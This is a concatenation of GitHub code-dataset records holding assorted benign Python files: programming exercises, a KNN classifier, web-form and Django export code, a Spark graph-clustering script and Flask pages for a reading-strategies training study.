self.psi, self.phi, self.theta\n","repo_name":"VELA-CLARA-software/SimFramed","sub_path":"SimulationFramework/Framework_elements.py","file_name":"Framework_elements.py","file_ext":"py","file_size_in_byte":48721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"71521156007","text":"class student:\r\n def setname(self,name):#using mutator method\r\n self.name=name\r\n def getname(self):#using accessor methods\r\n return self.name\r\n def setmarks(self,marks):#using mutator methods\r\n self.marks=marks\r\n def getmarks(self):#using accessor methods\r\n return self.marks\r\n#creating class instance\r\nn=int(input(\"Enter no. of students:\"))\r\ni=1\r\nwhile(i<=n):\r\n s=student()\r\n #Giving data to the class\r\n name=input(\"Enter name :\")\r\n s.setname(name)\r\n marks=int(input(\"Enter marks :\"))\r\n s.setmarks(marks)\r\n #Retriving data from the class\r\n print(\"Hi! 
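
gpt_ccs.relative_position above rotates the offset with _rotation_matrix(-theta), which is defined elsewhere in the framework; a conventional rotation about the vertical axis consistent with that usage would be the following (an assumption for illustration, not the framework's actual definition):

import numpy as np

def _rotation_matrix(theta):
    # Assumed form: yaw rotation mixing x and z, leaving y untouched.
    return np.array([[np.cos(theta), 0, np.sin(theta)],
                     [0, 1, 0],
                     [-np.sin(theta), 0, np.cos(theta)]])
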
\",s.getname()+\" you got \"+str(s.getmarks())+\" out of 700 marks\")\r\n i+=1\r\n print(\"-----------------------------------------------------------------------------------\")\r\n \r\n","repo_name":"MaesterPycoder/Python_Programming_Language","sub_path":"code list2/prapro012.py","file_name":"prapro012.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16553868643","text":"import logging\n\n\ndef setup_logger(log_file, level=logging.INFO):\n # Create a logger if it doesn't exist already\n logger = logging.getLogger()\n if len(logger.handlers) > 0:\n # Handlers already exist, return the existing logger\n return logger\n\n logger.setLevel(level)\n\n file_handler = logging.FileHandler(log_file)\n file_handler.setLevel(level)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(level)\n\n formatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n file_handler.setFormatter(formatter)\n stream_handler.setFormatter(formatter)\n\n logger.addHandler(file_handler)\n logger.addHandler(stream_handler)\n\n return logger\n","repo_name":"neelabalan/concurrency_from_ground_up","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17454876008","text":"#공부한 블로그 https://velog.io/@jajubal/%ED%8C%8C%EC%9D%B4%EC%8D%AC%EB%B0%B1%EC%A4%80-12907-%EB%8F%99%EB%AC%BC%EC%9B%90\nN = int(input())\narr = list(map(int, input().split()))\n\ntotal = [0] * 41 #[0,0,0,0,0,0,0,0...]\nex_total = 2\n\nfor a in arr:\n total[a] += 1 #[2,2,1,0,0,0,0,0,...] 나보다 큰 애들은 인덱스 만큼 있어 , 각 인덱스에 저장된 값은 그렇게 대답한 동물 수\n\ntmp = True\nfor cnt in total: #조건탐색\n if cnt > ex_total: # 인덱스가 뒤로 갈 수록 현재 인덱스에 저장된 값 보다 작아져야함 \n tmp = False\n break\n ex_total = cnt\n\nif tmp:\n print(2 ** (total.count(2) + (1 if 1 in total else 0)))\nelse:\n print(0)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열(nomal)문제모음/12907_동물원.py","file_name":"12907_동물원.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3632658025","text":"# TEE RATKAISUSI TÄHÄN:\nclass Alkio:\n \"\"\" Luokka mallintaa yhtä alkiota binääripuussa \"\"\"\n def __init__(self, arvo, vasen_lapsi:'Alkio' = None, oikea_lapsi:'Alkio' = None):\n self.arvo = arvo\n self.vasen_lapsi = vasen_lapsi\n self.oikea_lapsi = oikea_lapsi\n\ndef suurin_alkio(juuri: Alkio):\n summa = juuri.arvo\n if juuri.vasen_lapsi is not None:\n summa = max(summa, suurin_alkio(juuri.vasen_lapsi))\n\n if juuri.oikea_lapsi is not None:\n summa = max(summa, suurin_alkio(juuri.oikea_lapsi))\n\n return summa","repo_name":"sami-one/mooc-ohjelmointi-21","sub_path":"osa11-16_suurin_alkio/src/suurin_alkio.py","file_name":"suurin_alkio.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"fi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37278895568","text":"from typing import List\nfrom typing import Optional\n\nfrom fastapi import Request\n\n\nclass JobCreateForm:\n def __init__(self, request: Request):\n self.request: Request = request\n self.errors: List = []\n self.name: Optional[str] = None\n self.adhar: Optional[str] = None\n self.pen: Optional[str] = None\n \n\n async def load_data(self):\n form = await self.request.form()\n self.name = form.get(\"name\")\n self.adhar = 
form.get(\"adhar\")\n \n self.pen = form.get(\"pen\")\n \n\n def is_valid(self):\n if not self.name or not len(self.name) >= 4:\n self.errors.append(\"A valid name is required\")\n if not self.adhar or not len(self.adhar) >= 1:\n self.errors.append(\"A valid Adhar Number is required\")\n if not self.errors:\n return True\n return False\n","repo_name":"Shashi-Chaurasia/ocr_webpp_fastapi","sub_path":"backend/webapps/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14910708980","text":"from csv import writer\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse\nfrom euniwspace.models import ScannerLog\nimport datetime\nfrom django.shortcuts import render\n\ndef scanners(request, auth, map_id, from_date, format, to_date=None):\n \"\"\"Take logs between requested dates and display in csv\"\"\"\n if settings.EUNI_AUTH != auth or format not in ('csv', 'xml'):\n raise PermissionDenied \n if not to_date:\n to_date = datetime.datetime.combine(datetime.date.today(),\n datetime.time.max)\n else:\n to_date = datetime.datetime.combine(datetime.datetime.strptime(\n to_date, '%Y-%m-%d'), datetime.time.max)\n \n from_date = datetime.datetime.combine(datetime.datetime.strptime(\n from_date, '%Y-%m-%d'), datetime.time.min)\n logs = ScannerLog.objects.filter(time__range=(from_date, to_date))\\\n .filter(map_id=map_id).select_related('user__username',\n 'system__name', 'sig_type__longname')\n \n if format == 'csv':\n response = HttpResponse(mimetype='text/csv')\n csv = writer(response)\n csv.writerow(('Scanner', 'Time', 'System', 'Signature ID', 'Type', 'Info',\n 'Strength'))\n for log in logs:\n try:\n longname = log.sig_type.longname\n except:\n longname = ''\n csv.writerow((log.user.username, log.time.strftime('%Y-%m-%d %H:%M'),\n log.system.name, log.sigid, longname, \n log.info, log.strength))\n return response\n \n elif format == 'xml':\n return render(request, 'scanners.xml', {'logs': logs},\n content_type='application/xml')\n","repo_name":"joshuablake/euni-wspace","sub_path":"euniwspace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31760683367","text":"import csv\nimport logging\n\n\ndef init_csv(file_name):\n \"\"\"\n Writes header to csv\n \"\"\"\n header = [\"VS Name\", \"VS FQDN\", \"Pool Member Hosts\"]\n\n with open(file_name, \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write header row\n writer.writerow(header)\n\n file.close()\n\n\ndef append_csv(file_name, data):\n \"\"\"\n Writes data to a CSV file.\n \"\"\"\n\n logging.debug(f\"input: {data}\")\n\n with open(file_name, \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write rows\n writer.writerow(data)\n\n file.close()\n","repo_name":"ensec/f5-export","sub_path":"f5_export/utils/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10421405646","text":"import numpy as np\nimport os, sys\n\n\"\"\"\n程序主要功能: 使用KNN方法解决海伦小姐的约会预测(改进约会网站的配对效果)。\n数据集介绍: \n数据集产生的由来是这样的, 说海伦小姐收集约会的数据已经有一段时间了,她和不同的人约了1000次会之后(震惊脸!),收集了1000条数据\n整个数据集分为四列, 前三列分别为与她约会男士的特征, 最后一列为标签(海伦小姐是否喜欢)\n每列所表示的特征为: 每年获得的飞行常客里程数 / 玩游戏视频所消耗时间百分比 / 每周消费的冰淇淋升数 / 
海伦小姐是否喜欢\n其中第四列为标签列, 可以有三种取值(didntLike(不喜欢的人) / smallDoses(魅力一般的人) / largeDoses(极具魅力的人))\n\n使用常规的KNN方法根据三个特征预测样本点所代表的人是否是海伦喜欢的人。\n\"\"\"\n\ndef loadDataSet(dataset_route):\n \"\"\"\n 加载训练集合\n :param dataset_route: 训练集合路径\n :return: Feature_Matrix: 特征矩阵 Y_Matrix: 标签矩阵\n \"\"\"\n if not os.path.exists(dataset_route):\n raise Exception(\"error! not found the dataset file route: %s\" % (dataset_route))\n filein = open(dataset_route, \"r\", encoding=\"utf-8\")\n memory_lines = filein.readlines()\n line = memory_lines[0]\n feature_num = len(line.strip().split(\"\\t\")) - 1\n filein.close()\n\n line_num = len(memory_lines)\n print(\"Read DataSet Successful! DataSet Size: %d, Feature Num: %d\" % (line_num, feature_num))\n feature_matrix, label_matrix = list(), list()\n for idx, line in enumerate(memory_lines):\n line = line.strip()\n line_ext = line.split(\"\\t\")\n feature_matrix.append(line_ext[:-1])\n if line_ext[-1] == \"didntLike\": label_matrix.append(1)\n if line_ext[-1] == \"smallDoses\": label_matrix.append(2)\n if line_ext[-1] == \"largeDoses\": label_matrix.append(3)\n feature_matrix = np.array(feature_matrix).astype(np.float)\n label_matrix = np.array(label_matrix)\n return feature_matrix, label_matrix\n\ndef feature_normlization(dataSet):\n \"\"\"\n 特征归一化,在KNN分类算法过程中,若不进行特征值归一化,则容易导致若某个属性的特征值与其它特征值差异较大\n 主要造成的影响: 1) 特征值的取值范围较大往往会极大地增大两个样本间的距离度量结果\n 2) 特征之间的值差异较大, 造成梯度下降速度变慢\n\n 归一化方法: x = (x - minValue) / (maxValue - minValue) -> [0, 1]\n :param dataSet: 特征矩阵\n :return: 经过归一化的特征矩阵\n \"\"\"\n min_vals = dataSet.min(0)\n max_vals = dataSet.max(0)\n\n ranges = max_vals - min_vals\n norm_Matrix = np.zeros(np.shape(dataSet))\n rows = dataSet.shape[0]\n # np.tile() 方法可以实现矩阵的平铺, 第一个参数为平铺操作的基准数据, 后面第一个参数为沿着Y轴平铺的倍数, 第二个参数为沿着X轴平铺的倍数\n norm_Matrix = dataSet - np.tile(min_vals, (rows, 1))\n norm_Matrix = norm_Matrix / np.tile(ranges, (rows, 1))\n return norm_Matrix, ranges, min_vals\n\ndef split_train_test(X_Matrix, Y_Matrix, ratio):\n \"\"\"\n 交叉验证切分函数, 将特征矩阵和标签矩阵按照一定比例进行切分\n 一部分作为训练集, 另一部分作为测试集\n :param X_Matrix: 待切分的特征矩阵\n :param Y_Matrix: 待切分的标签矩阵\n :param ratio: 切分比例\n :return: X_Train: 训练特征矩阵 X_Valid: 测试特征矩阵 Y_Train: 训练标签矩阵 Y_Valid: 测试标签矩阵\n \"\"\"\n X_rows = X_Matrix.shape[0]\n train_rows = np.int(X_rows * ratio)\n X_Train = X_Matrix[:train_rows]\n Y_Train = Y_Matrix[:train_rows]\n X_Valid = X_Matrix[train_rows:]\n Y_Valid = Y_Matrix[train_rows:]\n return X_Train, X_Valid, Y_Train, Y_Valid\n\ndef sample_kNN_Classifier(TestX_Matrix, TrainX_Matrix, TrainY_Matrix, K):\n \"\"\"\n 对待分类的测试集执行KNN分类, 距离度量采用欧式距离来完成.\n :param TestX_Matrix: 测试集特征矩阵\n :param TrainX_Matrix: 训练集特征矩阵\n :param TrainY_Matrix: 训练集标签矩阵(最终根据找到的最近的K个样本的分类, 执行加权多数表决的方式作为最终分类结果)\n :param K: 设置每次预测选定最近的多少个点.\n :return: 返回分类结果\n \"\"\"\n print(\"TrainX_Matrix Shape: {}\".format(TrainX_Matrix.shape))\n print(\"TestX_Matrix Shape: {}\".format(TestX_Matrix.shape))\n distance = np.sqrt(np.sum((TrainX_Matrix - TestX_Matrix)**2, axis=1))\n ind = np.argsort(distance)\n class_count = {}\n for idx in range(K):\n vote = TrainY_Matrix[ind[idx]]\n class_count[vote] = class_count.get(vote, 0) + 1\n class_count = sorted(class_count.items(), key=lambda item:item[1], reverse=True)\n return class_count[0][0]\n\nX_Matrix, Y_Matrix = loadDataSet(\"./dataset/datingTestSet.txt\")\nxNorm_Matrix, Range, min_vals = feature_normlization(X_Matrix)\nX_train, X_valid, Y_train, Y_valid = split_train_test(X_Matrix, Y_Matrix, 0.8)\nprint(\"x_train: \" + str(X_train.shape))\nprint(\"x_valid: \" + str(X_valid.shape))\nprint(\"y_train: \" + 
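
feature_normlization above implements min-max scaling, x' = (x - min) / (max - min), by tiling the per-column minima and ranges with np.tile; NumPy broadcasting gives the same result without the tiling (an equivalent sketch):

import numpy as np

def min_max_normalize(X):
    # Column-wise (x - min) / (max - min); returns the same triple as
    # feature_normlization above.
    mins = X.min(axis=0)
    ranges = X.max(axis=0) - mins
    return (X - mins) / ranges, ranges, mins
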
str(Y_train.shape))\nprint(\"y_valid: \" + str(Y_valid.shape))\nlines = int(X_valid.shape[0])\naccurate = 0\nfor idx in range(lines):\n    # argument order matches the (TestX_Matrix, TrainX_Matrix, TrainY_Matrix, K) signature\n    class_result = sample_kNN_Classifier(X_valid[idx, :], X_train, Y_train, K=10)\n    accurate += int(Y_valid[idx] == class_result)\nacc = accurate / len(X_valid) * 100.0\nprint(str(acc) + \"%\")","repo_name":"Niutranser-Li/Machine-Learning-Algorithm","sub_path":"K近邻模型(KNN)/general_knn_hall.py","file_name":"general_knn_hall.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"zh","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"16423147990","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\") as f:\n    readme = f.read()\n\nsetup(\n    name=\"internet-curator\",\n    version=\"0.0.1\",\n    description=\"Internet curator\",\n    long_description=readme,\n    author=\"Rolv-Arild Braaten, Aksel Hjerpbakk\",\n    author_email=\"rolv.braaten@nb.no, aksel.hjerpbakk@nb.no\",\n    url=\"https://github.com/Rolv-Arild/nb-internet-curator\",\n    packages=find_packages(include=\"src\")\n)\n","repo_name":"Rolv-Arild/nb-internet-curator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38132394869","text":"from typing import List\n\n\nclass Solution:\n    def maxIncreaseKeepingSkyline(self, grid: List[List[int]]) -> int:\n        order = len(grid)\n        trans_grid = [[grid[j][i] for j in range(order) ] for i in range(order)]\n        skyline_h = [max(i) for i in grid]\n        skyline_v = [max(i) for i in trans_grid]\n        increase = 0\n        for i in range(order):\n            for j in range(order):\n                increase += min(skyline_h[i], skyline_v[j]) - grid[i][j]\n        return increase\n\n\nif __name__ == \"__main__\":\n    sol = Solution()\n    grid = [[3, 0, 8, 4], [2, 4, 5, 7], [9, 2, 6, 3], [0, 3, 1, 0]]\n    print(sol.maxIncreaseKeepingSkyline(grid))\n","repo_name":"chyt123/cosmos","sub_path":"coding_everyday/lc500+/lc807/MaxIncrease.py","file_name":"MaxIncrease.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24935989236","text":"def movie_organizer(*info):\n    movies = {}\n    for movie_info in info:\n        name, genre = movie_info[0], movie_info[1]\n\n        if genre not in movies:\n            movies[genre] = []\n        movies[genre].append(name)\n\n    result = []\n    for genre_content in sorted(movies.items(), key=lambda x: (-len(x[1]), x[0])):\n        result.append(f\"{genre_content[0]} - {len(genre_content[1])}\")\n        for movie in sorted(genre_content[1]):\n            result.append(f\"* {movie}\")\n\n    return \"\\n\".join(result)\n","repo_name":"Polishko/SoftUni","sub_path":"Python Advanced Exams/April 2023/movie_organizer.py","file_name":"movie_organizer.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27590865908","text":"from bs4 import BeautifulSoup\nimport sys\nimport os\n\nsoup = BeautifulSoup(open(sys.argv[1]), \"html5lib\")\nlis = soup.html.body.find_all(\"li\",recursive=False)\n\ni=0\nfor li in lis:\n    if i % 100==0:\n        aa = li.find_all('a')\n        if len(aa)==1:\n            path = li.a['href']\n            filename, ext = os.path.splitext(path)\n            folder_name = filename.replace('./','')\n            code_path = path.replace('./',sys.argv[2])\n            desc = li.text \n            #print(code_path,ext,folder_name)\n            #print(desc)\n            print('mkdir',folder_name)\n            print('cd',folder_name)\n            print('wget',code_path)\n            if ext=='.zip':\n            
print('unzip',path)\n print('rm',path)\n elif ext=='.gz':\n print('gunzip',path)\n print('git init')\n print('git add *')\n print('git commit -m\"first commit\"')\n print('github-linguist > risultato.txt')\n print('cd ..')\n i=i+1\n\n\n","repo_name":"alessandro-gentilini/Na6-P6-O18","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28247320055","text":"import pyspark\nimport sys\nimport re\nimport time\nimport math as ma\nimport csv\nimport os\nfrom itertools import combinations as comb\nfrom collections import defaultdict,Counter\nfrom functools import reduce\nfrom pyspark.sql import SparkSession, SQLContext, Row\nfrom pyspark.sql.types import StringType,StructType,StructField\nfrom graphframes import GraphFrame as GF\n\nimport time\n\nos.environ[\"PYSPARK_SUBMIT_ARGS\"] = (\"--packages graphframes:graphframes:0.6.0-spark2.3-s_2.11\")\n\nstart=time.time()\n\nconfiguration=pyspark.SparkConf().setAppName('task1').setMaster('local[3]')\n\nsci=pyspark.SparkContext(conf=configuration)\n\nspark=SQLContext(sci)\n\nsci.setLogLevel(\"ERROR\")\nsci.setLogLevel(\"OFF\")\n\n\nub_rdd=sci.textFile(sys.argv[2])\n\nubrd=ub_rdd.map(lambda x : tuple(x.split(\",\")))\n\nhead=ubrd.take(1)[0]\nubr=ubrd.filter(lambda x : x!=head)\n\nuids=ubr.map(lambda x : x[0]).distinct().sortBy(lambda x : x).collect()\n\nuser_bus=ubr.groupByKey().map(lambda x : (x[0],list(set(x[1])))).collectAsMap()\n\nuser_pairs=list(comb(uids,2))\n\nnodes=[]\ndirected_edges=[]\nthreshold=int(sys.argv[1])\nfor data in user_pairs:\n x=data[0]\n y=data[1]\n \n if(len(set(user_bus[x]) & set(user_bus[y]))>=threshold):\n nodes.append((x,))\n nodes.append((y,))\n directed_edges.append((x,y))\n directed_edges.append((y,x))\n \nnodes=list(set(nodes))\n#sch=StructType([StructField('vertices',StringType(),True)])\nnodes_df=spark.createDataFrame(nodes,[\"id\"]) \nedges_df=spark.createDataFrame(directed_edges,[\"src\",\"dst\"])\n\n\nnumber_iterations=5\ng=GF(nodes_df,edges_df)\ngraph=g.labelPropagation(maxIter=number_iterations)\n\ng_rdd=graph.rdd\n\ngrdd=g_rdd.map(lambda x : (x[1],x[0])).groupByKey().map(lambda x : sorted(list(x[1]))).sortBy(lambda x : (len(x),x[0]))\n\nfinal_data=grdd.collect()\n\nfile = open(sys.argv[3],\"w\");\n\nfor i in final_data[0:-1]:\n file.write(str(i)[1:-1])\n file.write(\"\\n\");\nfile.write(str(final_data[-1])[1:-1]) \n \nfile.close() \n\nend=time.time()\n\nprint(end-start)\n\n\n\n\n","repo_name":"sanketh1691/Data-Mining","sub_path":"Girvan Newman/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74716445927","text":"# Realizar un programa que calcule y muestre la suma de los múltiplos\n# de 5 comprendidos entre dos valores A y B. El programa no permitirá\n# introducir valores negativos para A y B y verificará que A es menor\n# que B. Si A es mayor que B, se deben intercambiar los valores.\n\nwhile True:\n a = int(input(\"Introduce un numero entero positivo:\\n\"))\n b = int(input(\"Introduce otro numero entero positivo:\\n\"))\n if (a >= 0 and b >= 0):\n break\n else:\n print(\"Se introdujo un valor negativo. 
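
task1.py above links two users whenever they share at least `threshold` businesses, storing each undirected edge as two directed rows for GraphFrames; the pair test in isolation (a plain-Python sketch; the original additionally wraps node ids in 1-tuples for createDataFrame):

from itertools import combinations

def build_edges(user_bus, threshold):
    # user_bus maps user id -> list of businesses they rated.
    nodes, edges = set(), []
    for x, y in combinations(sorted(user_bus), 2):
        if len(set(user_bus[x]) & set(user_bus[y])) >= threshold:
            nodes.update([x, y])
            edges += [(x, y), (y, x)]
    return sorted(nodes), edges
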
Reintentar!\\n\")\n\n#print(\"test 1: a vale \", a, \" y b vale \", b)\n\nif (a > b):\n (a, b) = (b, a) #intercambia valores!\n\n#print(\"test 2: a vale \", a, \" y b vale \", b)\nprint(\"\\n\", end=\"\")\n\ncontador = acumulador = 0\nfor i in range(a, b+1, 1):\n if (i%5 == 0):\n print(f\"{i} es multiplo de 5\")\n acumulador = acumulador + i\n contador += 1\n\nprint(f\"\\nLa suma de los {contador} multiplos de 5 comprendidos entre\"\n f\" {a} y {b} vale {acumulador}\")\n","repo_name":"AlexisRmnk/practicaInformatorio2022","sub_path":"prog_web/01_python/practicas_01_informatorio/ejercicios_complementarios/02_repetitivas/ej07.py","file_name":"ej07.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21169593918","text":"from flask import Blueprint, render_template, abort, flash, request, Markup, redirect, url_for, request, session\nfrom wrst.database import db\nfrom wrst.database.models import User, Relationship\nimport time\nfrom wrst.forms.wrst_forms import EntityEntityForm, TaxonomyForm, ComponentForm, SpatialForm, FunctionalForm, FinalSubmitForm, TextInputForm\nfrom wrst.forms.instruction_forms import InstructionForm\nfrom wrst.logic.decorators import login_required\nfrom wrst.logic.experiment import ProlificExperiment\n\nreading_training_routes = Blueprint('reading_training_routes', __name__)\n\n@reading_training_routes.route('/reading_training_1', methods=['GET', 'POST'])\n@login_required\ndef reading_training_1():\n\n form = InstructionForm(request.form)\n header = \"Reading Strategies Training\"\n content_items = Markup(\n \"\"\"

\n Before you begin reading, think about your goals. What are you trying to achieve by reading a certain text? \n For example, are you trying to understand a topic in depth, memorize concepts for an exam, or get a general \n idea of a subject you’re interested in? Knowing your goals will help you focus your attention and effort.\n

\n \"\"\"\n )\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_2')\n )\n\n@reading_training_routes.route('/reading_training_2', methods=['GET', 'POST'])\n@login_required\ndef reading_training_2():\n\n form = InstructionForm(request.form)\n header = \"Reading Strategies Training\"\n content_items = Markup(\n \"\"\"

\n Next, consider how using reading strategies can be personally useful to you. Many students do not automatically\n apply reading strategies, but certain strategies can be very useful. This particular study will only involve\n one text, but you can apply reading strategies to anything else you read in your life, which will help you\n learn faster and retain your knowledge longer. You will be more likely to retain these reading strategies if\n you believe they are useful.\n

\n \"\"\"\n )\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_before_you_start')\n )\n\n\n@reading_training_routes.route('/reading_training_before_you_start', methods=['GET', 'POST'])\n@login_required\ndef reading_training_before_you_start():\n\n form = InstructionForm(request.form)\n header = \"Before You Start Reading\"\n content_items = Markup(\n \"\"\"

\n First (before you begin reading the text fully), use the preview strategy to get the “big picture” of the topic \n of the reading assignment. Look at headings, subheadings, bolded words, and the first sentences in each section \n to give you clues about what is most important in the text. \n

\n \"\"\"\n )\n images = [\n ['reading_main.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.monitor_understanding')\n )\n\n@reading_training_routes.route('/monitor_understanding', methods=['GET', 'POST'])\n@login_required\ndef monitor_understanding():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n As you read, you should monitor your understanding of the content. Ask yourself how much of the text you are \n comprehending and how much of a knowledge gap you have between what you are reading about and what you already \n knew. Are you making progress toward meeting your original reading goal? If you do not know a word, can you use \n context clues to guess what it means? Having difficulties does not mean you should stop reading! Slow down and \n read more slowly when you reach difficult sections, and pause to think about what you just read. Your reading \n skills will grow as you continue to challenge yourself.\n

\n \"\"\"\n )\n images = [\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n )\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_evaluate')\n )\n\n@reading_training_routes.route('/reading_training_evaluate', methods=['GET', 'POST'])\n@login_required\ndef reading_training_evaluate():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n You should also evaluate the text as you read it. Who wrote the content? Why did they write it, and are there \n multiple purposes the text could serve? What kind of audience did the author intend to read it? What purpose \n does reading it serve you? Answering these questions will help you process and retain the information that you \n read.\n

\n \"\"\"\n )\n images = [\n ['reading_evaluate.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_keyword_strategy')\n )\n\n@reading_training_routes.route('/reading_training_keyword_strategy', methods=['GET', 'POST'])\n@login_required\ndef reading_training_keyword_strategy():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n Use the keyword strategy to mentally assign a \"keyword\" to each paragraph or section of text after \n you read the section. Try to use a keyword the text actually contains. \n

\n \"\"\"\n )\n images = [\n ['reading_keyword.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_after_reading')\n )\n\n# This route is currently deprecated but leaving in here for now in case we bring it back . . . .\n@reading_training_routes.route('/reading_training_mental_imagery', methods=['GET', 'POST'])\n@login_required\ndef reading_training_mental_imagery():\n\n form = InstructionForm(request.form)\n header = \"While Reading\"\n content_items = Markup(\n \"\"\"

\n Mental imagery is also a tool that can also be used on its own. Spend time to create a mental image of what you \n are reading, using any figures or photographs included with the text for guides. As you read more and learn \n more details, either expand upon that mental image, or build a second mental image. \n\n

\n \"\"\"\n )\n images = [\n ['reading_mental.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_after_reading')\n )\n\n@reading_training_routes.route('/reading_training_after_reading', methods=['GET', 'POST'])\n@login_required\ndef reading_training_after_reading():\n\n form = InstructionForm(request.form)\n header = \"After Reading\"\n content_items = Markup(\n \"\"\"

\n In some cases, re-reading is a useful strategy. You do not need to re-read the entire text. Re-reading \n is most effective when you focus on the sections you struggled with the most. Go slowly and pause if you need \n to as you re-read difficult passages.\n

\n \"\"\"\n )\n images = [\n ['reading_after.png', ''],\n ]\n content = Markup(header)\n\n if not form.validate_on_submit():\n\n return render_template('instruction_pages.html',\n form=form,\n instruction_header=header,\n content_items=content_items,\n images=images)\n if request.method == 'POST':\n # There is only one submit button so no need to check beyond \"POST\"\n\n return redirect(url_for('reading_training_routes.reading_training_maximizing_retention')\n )\n\n@reading_training_routes.route('/reading_training_maximizing_retention', methods=['GET', 'POST'])\n@login_required\ndef reading_training_maximizing_retention():\n\n form = InstructionForm(request.form)\n header = \"Maximizing Your Retention\"\n content_items = Markup(\n \"\"\"

\n Overall, reading to maximize your retention should involve some effort. By paying attention to not \n only what you are reading but how you are reading, and coming up with strategies like \n assigning keywords to paragraphs, you will be building a deeper understanding of the topic. The deeper you \n understand something, the better you will retain that information long-term, and the better prepared you \n will be to be tested on it later.\n

